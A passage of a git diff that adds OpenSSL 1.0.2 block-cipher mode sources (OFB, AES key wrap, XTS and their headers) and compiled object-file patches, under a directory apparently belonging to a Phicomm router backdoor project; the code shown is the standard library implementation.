+int CRYPTO_gcm128_decrypt_ctr32(GCM128_CONTEXT *ctx,
+                                const unsigned char *in, unsigned char *out,
+                                size_t len, ctr128_f stream);
+int CRYPTO_gcm128_finish(GCM128_CONTEXT *ctx, const unsigned char *tag,
+                         size_t len);
+void CRYPTO_gcm128_tag(GCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
+void CRYPTO_gcm128_release(GCM128_CONTEXT *ctx);
+
+typedef struct ccm128_context CCM128_CONTEXT;
+
+void CRYPTO_ccm128_init(CCM128_CONTEXT *ctx,
+                        unsigned int M, unsigned int L, void *key,
+                        block128_f block);
+int CRYPTO_ccm128_setiv(CCM128_CONTEXT *ctx, const unsigned char *nonce,
+                        size_t nlen, size_t mlen);
+void CRYPTO_ccm128_aad(CCM128_CONTEXT *ctx, const unsigned char *aad,
+                       size_t alen);
+int CRYPTO_ccm128_encrypt(CCM128_CONTEXT *ctx, const unsigned char *inp,
+                          unsigned char *out, size_t len);
+int CRYPTO_ccm128_decrypt(CCM128_CONTEXT *ctx, const unsigned char *inp,
+                          unsigned char *out, size_t len);
+int CRYPTO_ccm128_encrypt_ccm64(CCM128_CONTEXT *ctx, const unsigned char *inp,
+                                unsigned char *out, size_t len,
+                                ccm128_f stream);
+int CRYPTO_ccm128_decrypt_ccm64(CCM128_CONTEXT *ctx, const unsigned char *inp,
+                                unsigned char *out, size_t len,
+                                ccm128_f stream);
+size_t CRYPTO_ccm128_tag(CCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
+
+typedef struct xts128_context XTS128_CONTEXT;
+
+int CRYPTO_xts128_encrypt(const XTS128_CONTEXT *ctx,
+                          const unsigned char iv[16],
+                          const unsigned char *inp, unsigned char *out,
+                          size_t len, int enc);
+
+size_t CRYPTO_128_wrap(void *key, const unsigned char *iv,
+                       unsigned char *out,
+                       const unsigned char *in, size_t inlen,
+                       block128_f block);
+
+size_t CRYPTO_128_unwrap(void *key, const unsigned char *iv,
+                         unsigned char *out,
+                         const unsigned char *in, size_t inlen,
+                         block128_f block);
+
+#ifdef  __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes_lcl.h
new file mode 100644
index 0000000..900f54c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes_lcl.h
@@ -0,0 +1,143 @@
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use is governed by OpenSSL license.
+ * ====================================================================
+ */
+
+#include <openssl/modes.h>
+
+#if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+typedef __int64 i64;
+typedef unsigned __int64 u64;
+# define U64(C) C##UI64
+#elif defined(__arch64__)
+typedef long i64;
+typedef unsigned long u64;
+# define U64(C) C##UL
+#else
+typedef long long i64;
+typedef unsigned long long u64;
+# define U64(C) C##ULL
+#endif
+
+typedef unsigned int u32;
+typedef unsigned char u8;
+
+#define STRICT_ALIGNMENT 1
+#ifndef PEDANTIC
+# if defined(__i386)    || defined(__i386__)    || \
+     defined(__x86_64)  || defined(__x86_64__)  || \
+     defined(_M_IX86)   || defined(_M_AMD64)    || defined(_M_X64) || \
+     defined(__aarch64__)                       || \
+     defined(__s390__)  || defined(__s390x__)
+#  undef STRICT_ALIGNMENT
+# endif
+#endif
+
+#if !defined(PEDANTIC) && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+# if defined(__GNUC__) && __GNUC__>=2
+#  if defined(__x86_64) || defined(__x86_64__)
+#   define BSWAP8(x) ({ u64 ret=(x);                    \
+                        asm ("bswapq %0"                \
+                        : "+r"(ret));   ret;            })
+#   define BSWAP4(x) ({ u32 ret=(x);                    \
+                        asm ("bswapl %0"                \
+                        : "+r"(ret));   ret;            })
+#  elif (defined(__i386) || defined(__i386__)) && !defined(I386_ONLY)
+#   define BSWAP8(x) ({ u32 lo=(u64)(x)>>32,hi=(x);     \
+                        asm ("bswapl %0; bswapl %1"     \
+                        : "+r"(hi),"+r"(lo));           \
+                        (u64)hi<<32|lo;                 })
+#   define BSWAP4(x) ({ u32 ret=(x);                    \
+                        asm ("bswapl %0"                \
+                        : "+r"(ret));   ret;            })
+#  elif defined(__aarch64__)
+#   define BSWAP8(x) ({ u64 ret;                        \
+                        asm ("rev %0,%1"                \
+                        : "=r"(ret) : "r"(x)); ret;     })
+#   define BSWAP4(x) ({ u32 ret;                        \
+                        asm ("rev %w0,%w1"              \
+                        : "=r"(ret) : "r"(x)); ret;     })
+#  elif (defined(__arm__) || defined(__arm)) && !defined(STRICT_ALIGNMENT)
+#   define BSWAP8(x) ({ u32 lo=(u64)(x)>>32,hi=(x);     \
+                        asm ("rev %0,%0; rev %1,%1"     \
+                        : "+r"(hi),"+r"(lo));           \
+                        (u64)hi<<32|lo;                 })
+#   define BSWAP4(x) ({ u32 ret;                        \
+                        asm ("rev %0,%1"                \
+                        : "=r"(ret) : "r"((u32)(x)));   \
+                        ret;                            })
+#  endif
+# elif defined(_MSC_VER)
+#  if _MSC_VER>=1300
+#   pragma intrinsic(_byteswap_uint64,_byteswap_ulong)
+#   define BSWAP8(x)    _byteswap_uint64((u64)(x))
+#   define BSWAP4(x)    _byteswap_ulong((u32)(x))
+#  elif defined(_M_IX86)
+__inline u32 _bswap4(u32 val)
+{
+_asm mov eax, val _asm bswap eax}
+#   define BSWAP4(x)    _bswap4(x)
+#  endif
+# endif
+#endif
+#if defined(BSWAP4) && !defined(STRICT_ALIGNMENT)
+# define GETU32(p)       BSWAP4(*(const u32 *)(p))
+# define PUTU32(p,v)     *(u32 *)(p) = BSWAP4(v)
+#else
+# define GETU32(p)       ((u32)(p)[0]<<24|(u32)(p)[1]<<16|(u32)(p)[2]<<8|(u32)(p)[3])
+# define PUTU32(p,v)     ((p)[0]=(u8)((v)>>24),(p)[1]=(u8)((v)>>16),(p)[2]=(u8)((v)>>8),(p)[3]=(u8)(v))
+#endif
+/*- GCM definitions */ typedef struct {
+    u64 hi, lo;
+} u128;
+
+#ifdef  TABLE_BITS
+# undef  TABLE_BITS
+#endif
+/*
+ * Even though permitted values for TABLE_BITS are 8, 4 and 1, it should
+ * never be set to 8 [or 1]. For further information see gcm128.c.
+ */
+#define TABLE_BITS 4
+
+struct gcm128_context {
+    /* Following 6 names follow names in GCM specification */
+    union {
+        u64 u[2];
+        u32 d[4];
+        u8 c[16];
+        size_t t[16 / sizeof(size_t)];
+    } Yi, EKi, EK0, len, Xi, H;
+    /*
+     * Relative position of Xi, H and pre-computed Htable is used in some
+     * assembler modules, i.e. don't change the order!
+     */
+#if TABLE_BITS==8
+    u128 Htable[256];
+#else
+    u128 Htable[16];
+    void (*gmult) (u64 Xi[2], const u128 Htable[16]);
+    void (*ghash) (u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                   size_t len);
+#endif
+    unsigned int mres, ares;
+    block128_f block;
+    void *key;
+};
+
+struct xts128_context {
+    void *key1, *key2;
+    block128_f block1, block2;
+};
+
+struct ccm128_context {
+    union {
+        u64 u[2];
+        u8 c[16];
+    } nonce, cmac;
+    u64 blocks;
+    block128_f block;
+    void *key;
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ofb128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ofb128.c
new file mode 100644
index 0000000..4dbaccd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ofb128.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+/*
+ * The input and output encrypted as though 128bit ofb mode is being used.
+ * The extra state information to record how much of the 128bit block we have
+ * used is contained in *num;
+ */
+void CRYPTO_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], int *num, block128_f block)
+{
+    unsigned int n;
+    size_t l = 0;
+
+    assert(in && out && key && ivec && num);
+
+    n = *num;
+
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (16 % sizeof(size_t) == 0) { /* always true actually */
+        do {
+            while (n && len) {
+                *(out++) = *(in++) ^ ivec[n];
+                --len;
+                n = (n + 1) % 16;
+            }
+# if defined(STRICT_ALIGNMENT)
+            if (((size_t)in | (size_t)out | (size_t)ivec) % sizeof(size_t) !=
+                0)
+                break;
+# endif
+            while (len >= 16) {
+                (*block) (ivec, ivec, key);
+                for (; n < 16; n += sizeof(size_t))
+                    *(size_t *)(out + n) =
+                        *(size_t *)(in + n) ^ *(size_t *)(ivec + n);
+                len -= 16;
+                out += 16;
+                in += 16;
+                n = 0;
+            }
+            if (len) {
+                (*block) (ivec, ivec, key);
+                while (len--) {
+                    out[n] = in[n] ^ ivec[n];
+                    ++n;
+                }
+            }
+            *num = n;
+            return;
+        } while (0);
+    }
+    /* the rest would be commonly eliminated by x86* compiler */
+#endif
+    while (l < len) {
+        if (n == 0) {
+            (*block) (ivec, ivec, key);
+        }
+        out[l] = in[l] ^ ivec[n];
+        ++l;
+        n = (n + 1) % 16;
+    }
+
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ofb128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ofb128.o
new file mode 100644
index 0000000000000000000000000000000000000000..661389cc41d23f2d32477436e1a04486c8bcdc44
GIT binary patch
literal 1696
zcmbu8%}*0S6u@WO0;}S-njUH(WQ|RPDC@R>7DG(8w6L3O#bE146lz-wB-oF%TLlk#
z*kBlH)uTuM1pfq0Ricrj2SPM4BqpRviXKcfy3TBO`?1uEzGP?K`@N5uc{6)AAdZ;`
z0_Z}3GoWti6o4n@y6#m~FX#mOz&C5p5ALD>zjGJ3umFE?p&)!4=HWXYzB$j!pFLdR
z(9(u<gkSn1^}uyOc_}EXN{L(PBsq6b;gvOc)5<MRDCKpbXgMLkZ65laHoky{U{UM`
z!M+`_uYw^d$iJ;OgCZ22y&`-i!c`uIoV18s4khHwh$zRw7ceTI5c#L|mIHpkl}Ncn
z3WX7uFfhXMaD**y3i7tiwNZY|!!5kz^DT=Yf2#2FuPZ#UCJo`5WOWVVy<VFfE=yf-
zT`390(0(8k2d%ypyPI>{N#C;lWcecpyPdrJ!gFPcyUI;*(_Ewk#z#j_)4kzXJ|*Sp
zVP=3~`(3B<s_DApW*K&{uZs2VT99HxUmN<y&xU~sfM=NL?YAQx3vqiA5DPY<tFwcA
zgf7gFShwl{pa);z7-f5C3Q&#*W*<ctEdi?cew&|S@3oIp9=XF$WlUcw4@a>a)r$gr
zl*32ad=#mb*frsj7O<o2av)%C`C>3fyKf=p+G(1dX7$v~3|nT<z8k8%<1ZX{tXcLV
z^I*e1)gIxH^i0g<_AqfUI(hkAXd+UzBZ*WzyO@yxjbo7DlQf-%$t@<OXbdnpDO;WA
zbWKVuNPxK>m7;)&<#K?Dr<2J<3b9mLN-*eJ`*Tt>KCjucsXUX(rZb7Gv<R4N;zpE7
z%tdCh(PTnh`oD%Ql#TDs*g>yWwblpC#<7iZ7#W!9?@#wl8v`|m5g$byKdOJtKaO&7
zO%{EPqOX6f5h7h*U!R8>SYs&E0~%qA*Z^Yql{MWxvhhEMg;vM<VElomkPC+z^Pg(@
z*XpUNX3W2YD1Oae)mtBEt)UJL?Ljl%r=G9#R%_!Fo3^0}Hjv=|1J^L-V`jWNgldph
YjryP+s|F4rtyR89gR`~Bs$$Il1J`lP$N&HU

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/wrap128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/wrap128.c
new file mode 100644
index 0000000..4dcaf03
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/wrap128.c
@@ -0,0 +1,138 @@
+/* crypto/modes/wrap128.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/modes.h>
+
+static const unsigned char default_iv[] = {
+    0xA6, 0xA6, 0xA6, 0xA6, 0xA6, 0xA6, 0xA6, 0xA6,
+};
+
+/*
+ * Input size limit: lower than maximum of standards but far larger than
+ * anything that will be used in practice.
+ */
+#define CRYPTO128_WRAP_MAX (1UL << 31)
+
+size_t CRYPTO_128_wrap(void *key, const unsigned char *iv,
+                       unsigned char *out,
+                       const unsigned char *in, size_t inlen,
+                       block128_f block)
+{
+    unsigned char *A, B[16], *R;
+    size_t i, j, t;
+    if ((inlen & 0x7) || (inlen < 8) || (inlen > CRYPTO128_WRAP_MAX))
+        return 0;
+    A = B;
+    t = 1;
+    memcpy(out + 8, in, inlen);
+    if (!iv)
+        iv = default_iv;
+
+    memcpy(A, iv, 8);
+
+    for (j = 0; j < 6; j++) {
+        R = out + 8;
+        for (i = 0; i < inlen; i += 8, t++, R += 8) {
+            memcpy(B + 8, R, 8);
+            block(B, B, key);
+            A[7] ^= (unsigned char)(t & 0xff);
+            if (t > 0xff) {
+                A[6] ^= (unsigned char)((t >> 8) & 0xff);
+                A[5] ^= (unsigned char)((t >> 16) & 0xff);
+                A[4] ^= (unsigned char)((t >> 24) & 0xff);
+            }
+            memcpy(R, B + 8, 8);
+        }
+    }
+    memcpy(out, A, 8);
+    return inlen + 8;
+}
+
+size_t CRYPTO_128_unwrap(void *key, const unsigned char *iv,
+                         unsigned char *out,
+                         const unsigned char *in, size_t inlen,
+                         block128_f block)
+{
+    unsigned char *A, B[16], *R;
+    size_t i, j, t;
+    inlen -= 8;
+    if ((inlen & 0x7) || (inlen < 16) || (inlen > CRYPTO128_WRAP_MAX))
+        return 0;
+    A = B;
+    t = 6 * (inlen >> 3);
+    memcpy(A, in, 8);
+    memcpy(out, in + 8, inlen);
+    for (j = 0; j < 6; j++) {
+        R = out + inlen - 8;
+        for (i = 0; i < inlen; i += 8, t--, R -= 8) {
+            A[7] ^= (unsigned char)(t & 0xff);
+            if (t > 0xff) {
+                A[6] ^= (unsigned char)((t >> 8) & 0xff);
+                A[5] ^= (unsigned char)((t >> 16) & 0xff);
+                A[4] ^= (unsigned char)((t >> 24) & 0xff);
+            }
+            memcpy(B + 8, R, 8);
+            block(B, B, key);
+            memcpy(R, B + 8, 8);
+        }
+    }
+    if (!iv)
+        iv = default_iv;
+    if (memcmp(A, iv, 8)) {
+        OPENSSL_cleanse(out, inlen);
+        return 0;
+    }
+    return inlen;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/wrap128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/wrap128.o
new file mode 100644
index 0000000000000000000000000000000000000000..c35ff55ac69fba4816dff2fd72459ba1959a5648
GIT binary patch
literal 2800
zcmbtVU2Gdg5MKB4V?=s(D}*8yRYp3HBT{3xARN>dpA#p0bkkI^13^$uPU4VK+X>FO
zKY%F3N?~P=<`MB+A@Rl|ARZjrN-aVN5Ebx(D%6LxDKt<igbFxj?)H+))fGsLwBDI-
zXJ&W5nLVG#u>MVf0C6Qi_L6nWMG2W{U)NK%nj$jUOm2p@-%_7epVIi>>WG>f$ufSH
z)~?eDTHpOZ6dWmkRY@i+wRX8ZG<OpKjekqc>?%EZYt^z&gx>tgc3RfVoD!t`OUi$s
z{JWcH=v<@PPR&-_i`EG<U$H)JL)|o#sJ3uJqP$OueuQVG{Cp<y^S*kn8xk<3lk(qj
zF-&<*i8KBi<%SYuyhBl~uT$}&@-RL5mj!XG-l5PstkF7p*CF)C{ghv$3)h12oDy@?
zFsM5mwG-5CT8FIEI=_#@ep>B(ko7Dbed9^9FBzcL#n4>YvMfv(WoB<s<1NaPlu0xY
zNlwsREjB4e>muw=Xzd(jyz%To^*QyR`n;;2b?HPd2l=^?EO0prTsmQRE1GDiwJX47
z0<Nx^sYSYH+2*keZGK5Jr&eiwi^eUDuP}atnlAw>SAkHzh=e3HbJU^>ixOQ}lGIO;
z(jha~x=ar@+9+Qb<X<7fNyfinU7yjOOQBOHxWt+A1U>l&vW66WE-2dTs7TQsM@5Qu
zYjxlr7=S`B*fL^Qg}Eh3F@DQi66Ua<Q&M&b9PWVR2-ZjAVXd|Z6~Z!E7q3nryItRF
z))%3<LC^>1R;umHd=w4_tpTm}Nf0!~S8Rgk8pc-2e*qe7b19ffTv?JdejPV~9=)v`
zql{nnl!K7>g^+>X-p3=+k+Evos788XyJGPjiN~t8nRsnyJQjbX%YpGEgtWj2!@&L>
z*grxx5z;_Rf`M|6Gm*f{!z6Gl9N5;;9-M~?Qo!#MYeU%F{c`y9rnKDoj+BujW=mR*
zzTK+I@l$Q8oUFAE$gc;au7I5EljEu!P0JB*P0Qi53^ZV_DUs{+#$4biazUWT)hEvf
zq~aZNi8QxOn6`!dij8rbNKL;a$brkk#t_M7Z6kI!m;swb2Zw8|iR8i8Ku{#&`B-@t
zB;t);Uy#UM>xM^@2)>Suaxa)$J@>L}1lWTxu-<;z4L~z|5OB=n#@qD)OuvKw<Q;Hw
zw344m>`cbS$wXl?Uo9H?p(CVs_?ZK_AsuiX*NHyBhSDn2hx+@onVg<e(=4MCU7t1b
z<A?R}sl)nY{!q~yRxR6sr9x@EG((0CWcFvXOdl^6^5xkAoFxwf1^U`%=}&lzC_UH^
zAlU1hVYv8P=m_HXe^21(AA;fff8fE9KNr8?!M*t-;Ddt8!o{|W_U}6G@=ap1$4f?j
z3}&O^%u}vbDHQWDqj1b1v5CBqC$X{FSrV&EJI45QsZ=P#T6x+i#Nci3uvrxL3*~BT
zrZPQKs2Il~1~V0=^vO!TgslC4i9iaZ*x#8cz)*hlULI^w4touMw!uKIQ!u=e6ba`A
z=)60!_F_5(j(v_f{V#aC9}xcj{ks9jSLk>Duki_p#hkutl88v?f8l<+N5scr_DWR5
zKjZ~LchB$6X%FUg&H67S7Tq}4cNi4>I{D8(D&ixqqnQ2Ye-ZFz_dh1$Km3<??80XC
zzaZ-G@`ClpucEuZTmNQz<CalO3i7VFa0lp^!yk`1n^D!kKT41z&b0RH=Wh$FG>cyq
M=Qq|O9mOC24{)B<MgRZ+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/xts128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/xts128.c
new file mode 100644
index 0000000..8f2af58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/xts128.c
@@ -0,0 +1,204 @@
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+int CRYPTO_xts128_encrypt(const XTS128_CONTEXT *ctx,
+                          const unsigned char iv[16],
+                          const unsigned char *inp, unsigned char *out,
+                          size_t len, int enc)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    union {
+        u64 u[2];
+        u32 d[4];
+        u8 c[16];
+    } tweak, scratch;
+    unsigned int i;
+
+    if (len < 16)
+        return -1;
+
+    memcpy(tweak.c, iv, 16);
+
+    (*ctx->block2) (tweak.c, tweak.c, ctx->key2);
+
+    if (!enc && (len % 16))
+        len -= 16;
+
+    while (len >= 16) {
+#if defined(STRICT_ALIGNMENT)
+        memcpy(scratch.c, inp, 16);
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+#else
+        scratch.u[0] = ((u64 *)inp)[0] ^ tweak.u[0];
+        scratch.u[1] = ((u64 *)inp)[1] ^ tweak.u[1];
+#endif
+        (*ctx->block1) (scratch.c, scratch.c, ctx->key1);
+#if defined(STRICT_ALIGNMENT)
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+        memcpy(out, scratch.c, 16);
+#else
+        ((u64 *)out)[0] = scratch.u[0] ^= tweak.u[0];
+        ((u64 *)out)[1] = scratch.u[1] ^= tweak.u[1];
+#endif
+        inp += 16;
+        out += 16;
+        len -= 16;
+
+        if (len == 0)
+            return 0;
+
+        if (is_endian.little) {
+            unsigned int carry, res;
+
+            res = 0x87 & (((int)tweak.d[3]) >> 31);
+            carry = (unsigned int)(tweak.u[0] >> 63);
+            tweak.u[0] = (tweak.u[0] << 1) ^ res;
+            tweak.u[1] = (tweak.u[1] << 1) | carry;
+        } else {
+            size_t c;
+
+            for (c = 0, i = 0; i < 16; ++i) {
+                /*
+                 * + substitutes for |, because c is 1 bit
+                 */
+                c += ((size_t)tweak.c[i]) << 1;
+                tweak.c[i] = (u8)c;
+                c = c >> 8;
+            }
+            tweak.c[0] ^= (u8)(0x87 & (0 - c));
+        }
+    }
+    if (enc) {
+        for (i = 0; i < len; ++i) {
+            u8 c = inp[i];
+            out[i] = scratch.c[i];
+            scratch.c[i] = c;
+        }
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+        (*ctx->block1) (scratch.c, scratch.c, ctx->key1);
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+        memcpy(out - 16, scratch.c, 16);
+    } else {
+        union {
+            u64 u[2];
+            u8 c[16];
+        } tweak1;
+
+        if (is_endian.little) {
+            unsigned int carry, res;
+
+            res = 0x87 & (((int)tweak.d[3]) >> 31);
+            carry = (unsigned int)(tweak.u[0] >> 63);
+            tweak1.u[0] = (tweak.u[0] << 1) ^ res;
+            tweak1.u[1] = (tweak.u[1] << 1) | carry;
+        } else {
+            size_t c;
+
+            for (c = 0, i = 0; i < 16; ++i) {
+                /*
+                 * + substitutes for |, because c is 1 bit
+                 */
+                c += ((size_t)tweak.c[i]) << 1;
+                tweak1.c[i] = (u8)c;
+                c = c >> 8;
+            }
+            tweak1.c[0] ^= (u8)(0x87 & (0 - c));
+        }
+#if defined(STRICT_ALIGNMENT)
+        memcpy(scratch.c, inp, 16);
+        scratch.u[0] ^= tweak1.u[0];
+        scratch.u[1] ^= tweak1.u[1];
+#else
+        scratch.u[0] = ((u64 *)inp)[0] ^ tweak1.u[0];
+        scratch.u[1] = ((u64 *)inp)[1] ^ tweak1.u[1];
+#endif
+        (*ctx->block1) (scratch.c, scratch.c, ctx->key1);
